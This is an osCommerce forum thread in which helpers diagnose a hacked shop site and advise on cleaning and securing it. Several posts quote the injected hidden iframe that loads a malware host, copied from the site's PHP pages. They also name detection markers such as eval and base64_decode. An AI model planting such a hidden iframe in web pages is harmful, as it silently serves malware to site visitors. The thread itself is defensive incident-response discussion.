Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Securiy breach message


ogwinilo

Recommended Posts

When opening my site, the web browser displays the folling message:

 

"This website has been reported as unsafe

www.herbalsa.com

 

We recommend that you do not continue to this website.

 

This website has been reported to Microsoft for containing threats to your computer that might reveal personal or financial information.

This website has been reported to contain the following threats:

Malicious software threat: This site contains links to viruses or other software programs that can reveal personal information stored or typed on your computer to malicious persons."

 

This after installing an .htaccess patch and setting the permissions correctly and now I can't open my products, it says products cannot be found, yet are in the database. Only some of the new template installation changes are reflected on my site.

 

What could be the solution these?

 

Thanks in advance

 

Felix

Link to comment
Share on other sites

You may well have been hacked. It does not sound as though you took all the measures necessary to secure osc. I suggest you install the Site Monitor addon and use it to check whether there are any suspicious files on your site. You can also browse the osc directories for files that should not be there - particularly look for php files in the images directory, for example and open up some of the script (php) files to see whether there is a line at the top with the word 'eval' in it.

 

You can find details of all the measures needed to secure osc here. They all have to be done, and done on a site that has been cleaned of hacker files and code, and the database also needs to be checked for extra administrator accounts.

 

In case there is some innocent explanation for it, to do with the way you have set the .htaccess settings and any template you have installed, you still need to take all the necessary security measures and not just install an '.htaccess patch'

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

When opening my site, the web browser displays the folling message:

 

"This website has been reported as unsafe

Indeed. At the bottom of your index page is a hidden iframe that is mentioned as an attack site hosting malicious malware:

 

<iframe src="http:// jL . chura . pl / rc/ "·style="display:none"></iframe>

 

See for example this page at Google

 

In your page:

 

</table>
<iframe src="http://as_above_without_spaces" style="display:none"></iframe>
</body>
</html>

Link to comment
Share on other sites

Indeed. At the bottom of your index page is a hidden iframe that is mentioned as an attack site hosting malicious malware:

 

<iframe src="http:// jL . chura . pl / rc/ "·style="display:none"></iframe>

 

See for example this page at Google

 

In your page:

 

</table>
<iframe src="http://as_above_without_spaces" style="display:none"></iframe>
</body>
</html>

Link to comment
Share on other sites

Thanks for your valuable feedback.

I don't seem to locate:

</table>

<iframe src="http://as_above_without_spaces" style="display:none"></iframe>

</body>

</html>

 

Is it in the index.php file? When I find it,do i find it (I know it feels like a stupid question).

 

Are the suggested add ons by Ben Nevis in this post sufficient to pick it up and deal with it?

 

Thanks again

Link to comment
Share on other sites

I suppose you could ask in the Site Monitor thread for what sort of code changes it checks for when identifying suspicious files.

 

This might not be the only hack on your site though so this is not the only 'it' that needs to be dealt with. The thread I referred you to has links to the various threads and posts for stopping various types of hacks on osc. There is a lot to do there, and none of it will work if you don't do the first step of either restoring your site and database from an unhacked backup, which can be difficult if you don't know what to look for in deciding whether the backup is 'clean' or not, or else identifying and removing all hacker code and files manually. Site Monitor can help with this but again you need to know what sort of code to look for, which it appears you don't, so you're in a bit of a catch 22 situation. All you can do is start, use Site Monitor either on your current site or from whatever backup you choose, look at and ask questions about any files it identifies, and try to get rid of the hacks. Then you will still have to do all the other things listed in the thread I referred you to.

 

The 'dealing with it' has to be done by you adding the addons and code changes, the changes and addons all together should secure your site to the best of knowledge of current exploits and preventing them.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

I suppose you could ask in the Site Monitor thread for what sort of code changes it checks for when identifying suspicious files.

It looks for files that have been changed, dates last modified changes, and file size changes. It does not look for code.

 

The problem with site monitor, and it is really not a problem but its just the way it works, is that if you install site monitor to a site that has already been hacked it assumes that the hacked code is correct.

 

You see....when you run site monitor for the first time you are telling it that what you now have is correct and site monitor makes a database of the files then on your server at that time. It then checks your site when it runs against that database and report any differences from then on.

 

By installing site monitor on a hacked site you are not fixing anything and site monitor will not report anything out of the ordinary until something changes again.

 

You should only install site monitor on a fresh install, and run it daily to quickly find out that you have been compromised. It will not prevent you from being hacked. That comes from other add ons.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Link to comment
Share on other sites

It looks for files that have been changed, dates last modified changes, and file size changes. It does not look for code.

 

 

According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.

 

 

Truly humbled and appreciative of your input. I'm busy with those installs. I feel there still a long way but will keep u posted.

However, and i dont know if this is associated with this, but when i open the site on my mobile phone, i get:

'My SQL Error!'

 

The error returned was:

Table 'statistics' is marked as crashed and should be repaired

Error Number 1194

SELECT * FROM statistics

WHERE ip='196.207.40.238' "

Link to comment
Share on other sites

According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.

Specifically, apart from changed and added files it looks for base64_decode and iframes. This can certainly be useful in identifying possibly hacked files even if it is run after hacking has taken place and the original date/timestamps and list of genuine files are unknowns. It does however have to be said that backdoors can be opened with files that don't contain either of these, and such files, even if not genuine osc files, won't be discovered simply by using Site Monitor if it is run for the first time, after hacking has already taken place.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.

You're right. It does, because I didn't read the history or dig deeper into it when I first looked at it. My mistake..

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Link to comment
Share on other sites

On installing the Site Monitor, I get the following results on checking for hacked files:

 

<quote>Manually Check for Hacked Files

Check all files for known hacker type code. Found files are suspect but not necessarily infected

 

Checked 103 directories containing a total of 634 files. Skipped 386 files. 9 suspected hacked files found.

 

Hacked Files Found

php.ini

admin/administrators.php

admin/login.php

admin/sitemonitor_admin.php

admin/sitemonitor_configure_setup.php

admin/includes/classes/nusoap.php

includes/sts_template.html

includes/classes/nusoap.php

includes/modules/payment/paypal_standard.php

</quote>

 

Is there a tool to spot and remove the corrupted aspects/codes in these?

What should I do?

 

Thanks

 

Felix

Link to comment
Share on other sites

On installing the Site Monitor, I get the following results on checking for hacked files:

 

 

Is there a tool to spot and remove the corrupted aspects/codes in these?

What should I do?

 

Thanks

 

Felix

Short answer - no. You have to open them up and look at them. They might or might not be safe, I would suspect at least some of them probably aren't. If you only just installed Site Monitor it seems a bit unlikely it would have been immediately hacked. You will be looking for any inserted code calling the 'eval' function, or with <iframe> tags you didn't put there. If you find such code, post the section containing it here and someone should be able to tell you whether it's a hack or not. Most probably it will be.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

And if your admin directory is called admin, you'd better change it quick. See the links in the thread I referred you to in my post of 4th Jan, in particular the 'How to secure your site' thread.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

You will be looking for any inserted code calling the 'eval' function, or with <iframe> tags you didn't put there.

The iframe is still there at this moment (added spaces around dots in url) at the bottom of the HTML code (application_bottom.php? includes/footer.php?, index.php?):

<table width="780" align="center"  cellpadding="0" cellspacing="0">
 <tr> 
   <td><div align="center" class="style1"></div></td>
 </tr>
</table>
<iframe src="http:// jL . chura . pl /rc/" style="display:none"></iframe>
</body>
</html>

 

But at least the admin section is secured with an .htacccess.

Link to comment
Share on other sites

Short answer - no. You have to open them up and look at them. They might or might not be safe, I would suspect at least some of them probably aren't. If you only just installed Site Monitor it seems a bit unlikely it would have been immediately hacked. You will be looking for any inserted code calling the 'eval' function, or with <iframe> tags you didn't put there. If you find such code, post the section containing it here and someone should be able to tell you whether it's a hack or not. Most probably it will be.

 

Appreciate your clarity. Will do.

By the way, can I install IP Trap via the cPanel's File Manager or it strictly must be through FTP?

 

Regards

 

Felix

(South Africa)

Link to comment
Share on other sites

Appreciate your clarity. Will do.

By the way, can I install IP Trap via the cPanel's File Manager or it strictly must be through FTP?

 

Regards

 

Felix

(South Africa)

 

 

Of the nine possibly hacked files, I've managed to look at 4. Please look at the following code to see if my suspicions of infection are founded.

 

Found the following codes suspected to be hacks:

 

1. At the bottom of; login.php, bottom of page

</td>

</tr>

</table>

<!-- body_eof //-->

 

<!-- footer //-->

<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>

<!-- footer_eof //-->

<br>

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

</body>

</html>

<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

2. Also at the bottom of; admin/sitemonitor_admin.php

<!-- END MANUALLY CHECK FOR HACKED FILES -->

 

</table></td>

<!-- body_text_eof //-->

</tr>

</table>

<!-- body_eof //-->

 

<!-- footer //-->

<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>

<!-- footer_eof //-->

<br>

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

</body>

</html>

<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

3. Also at the bottom of; admin/sitemonitor_configure_setup.php

<!-- footer //-->

<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>

<!-- footer_eof //-->

<br>

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

</body>

</html>

<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

4. The admin/includes/classes/nusoap.php file is too big but managed to extract the following code:

}

// eval the class

eval($evalStr);

// instantiate proxy object

eval("\$proxy = new nusoap_proxy_$r('');");

// transfer current wsdl data to the proxy thereby avoiding parsing the wsdl twice

$proxy->endpointType = 'wsdl';

 

 

/**

* dynamically creates proxy class code

*

* @return string PHP/NuSOAP code for the proxy class

* @access private

*/

function _getProxyClassCode($r) {

$this->debug("in getProxy endpointType=$this->endpointType");

$this->appendDebug("wsdl=" . $this->varDump($this->wsdl));

if ($this->endpointType != 'wsdl') {

$evalStr = 'A proxy can only be created for a WSDL client';

$this->setError($evalStr);

$evalStr = "echo \"$evalStr\";";

return $evalStr;

}

if ($this->endpointType == 'wsdl' && is_null($this->wsdl)) {

$this->loadWSDL();

if ($this->getError()) {

return "echo \"" . $this->getError() . "\";";

}

}

$evalStr = '';

foreach ($this->operations as $operation => $opData) {

if ($operation != '') {

// create param string and param comment string

if (sizeof($opData['input']['parts']) > 0) {

$paramStr = '';

$paramArrayStr = '';

$paramCommentStr = '';

foreach ($opData['input']['parts'] as $name => $type) {

$paramStr .= "\$$name, ";

$paramArrayStr .= "'$name' => \$$name, ";

$paramCommentStr .= "$type \$$name, ";

}

$paramStr = substr($paramStr, 0, strlen($paramStr)-2);

$paramArrayStr = substr($paramArrayStr, 0, strlen($paramArrayStr)-2);

$paramCommentStr = substr($paramCommentStr, 0, strlen($paramCommentStr)-2);

} else {

$paramStr = '';

$paramArrayStr = '';

$paramCommentStr = 'void';

}

$opData['namespace'] = !isset($opData['namespace']) ? 'http://testuri.com' : $opData['namespace'];

$evalStr .= "// $paramCommentStr

function " . str_replace('.', '__', $operation) . "($paramStr) {

\$params = array($paramArrayStr);

return \$this->call('$operation', \$params, '".$opData['namespace']."', '".(isset($opData['soapAction']) ? $opData['soapAction'] : '')."');

}

";

unset($paramStr);

unset($paramCommentStr);

}

}

$evalStr = 'class nusoap_proxy_'.$r.' extends nusoap_client {

'.$evalStr.'

}';

return $evalStr;

}

 

 

Please suggest appropriate course of action in these cases

 

Thans a great deal

 

Felix

Link to comment
Share on other sites

Thanx for the response. Just to confirm, would you suggest I remove them?

What i would do is ask myself:

 

"How many add ons have I added to this install?"

"How long will it take me to reinstall them if I wipe my site and install fresh?"

"Do i have backup files known to be good prior to being hacked the first time? (Do I even know the first time I was hacked?)"

"Do I have the skills to risk doing a manual clean of the files and go back live?"

 

First choice is going to be wipe the site and start over, not putting it live on the internet until all security mods have been installed.

Second is going to be wipe the site and reinstall from a good backup.

And only if I have no other choice would I manually clean the files..

 

If I had to do the latter I would completely remove the site from access. Download all files to my local hard drive. Do a search for iframes with whatever means I have available to me, and delete them all.

 

Then, take a list of filenames from a stock OSC and note all files that is a part of the stock osc. Note any files that are a part of any add on I installed. Any remaining files should be deleted.

 

Wipe the site clean. This step is real important!

 

Finally, upload the site files and start testing, all the while having access to the site restricted to you only.

 

 

Is that what you were hoping for?

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Link to comment
Share on other sites

What i would do is ask myself:

 

"How many add ons have I added to this install?"

"How long will it take me to reinstall them if I wipe my site and install fresh?"

"Do i have backup files known to be good prior to being hacked the first time? (Do I even know the first time I was hacked?)"

"Do I have the skills to risk doing a manual clean of the files and go back live?"

 

First choice is going to be wipe the site and start over, not putting it live on the internet until all security mods have been installed.

Second is going to be wipe the site and reinstall from a good backup.

And only if I have no other choice would I manually clean the files..

 

If I had to do the latter I would completely remove the site from access. Download all files to my local hard drive. Do a search for iframes with whatever means I have available to me, and delete them all.

 

Then, take a list of filenames from a stock OSC and note all files that is a part of the stock osc. Note any files that are a part of any add on I installed. Any remaining files should be deleted.

 

Wipe the site clean. This step is real important!

 

Finally, upload the site files and start testing, all the while having access to the site restricted to you only.

 

 

Is that what you were hoping for?

 

 

Great stuff, thanks a lot

Link to comment
Share on other sites

Great stuff, thanks a lot

 

I am trying to delete all the iframe codes manually using a notepad, I save the changes, but the next time I open the document, it's not deleted. Is there a special way I can delete these?

Link to comment
Share on other sites

1, 2, and 3 are definite hacks - it's the same code that Jan Zonjee already pointed out. nusoap.php isn't a standard osc2.2 file that I'm aware, but it does not appear to be hacker code. In another thread someone said it's a CRE secure payment module. CRE is an osc fork - is that what you are using by any chance? Anyway if you don't use that module you can remove it.

 

As Mark said, the best thing is to start again from a believed clean backup, and install Site Monitor again to check the backup.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

I am trying to delete all the iframe codes manually using a notepad, I save the changes, but the next time I open the document, it's not deleted. Is there a special way I can delete these?

So, you are working with a local copy of the file. You know it's location on your hard disk. You open it. Change it. And save it. Any errors yet?

 

No? Ok, open it. Did it revert back to the original code? Yes? Do a virus scan on your local machine.

 

 

Is your shop on your local machine by chance? Were you running your shop on the internet on your local machine? Windows? If the answer to this is yes, then you seriously need to consider doing a factory restore on your local machine. The hacker most likely put code deep in your machine where you will never find it and thus you will never fix this problem.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Link to comment
Share on other sites

So, you are working with a local copy of the file. You know it's location on your hard disk. You open it. Change it. And save it. Any errors yet?

 

No? Ok, open it. Did it revert back to the original code? Yes? Do a virus scan on your local machine.

 

 

Is your shop on your local machine by chance? Were you running your shop on the internet on your local machine? Windows? If the answer to this is yes, then you seriously need to consider doing a factory restore on your local machine. The hacker most likely put code deep in your machine where you will never find it and thus you will never fix this problem.

 

 

Wow! This is hectic. Thanks for the tips. will do.

Who would do such things, this is amazing

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...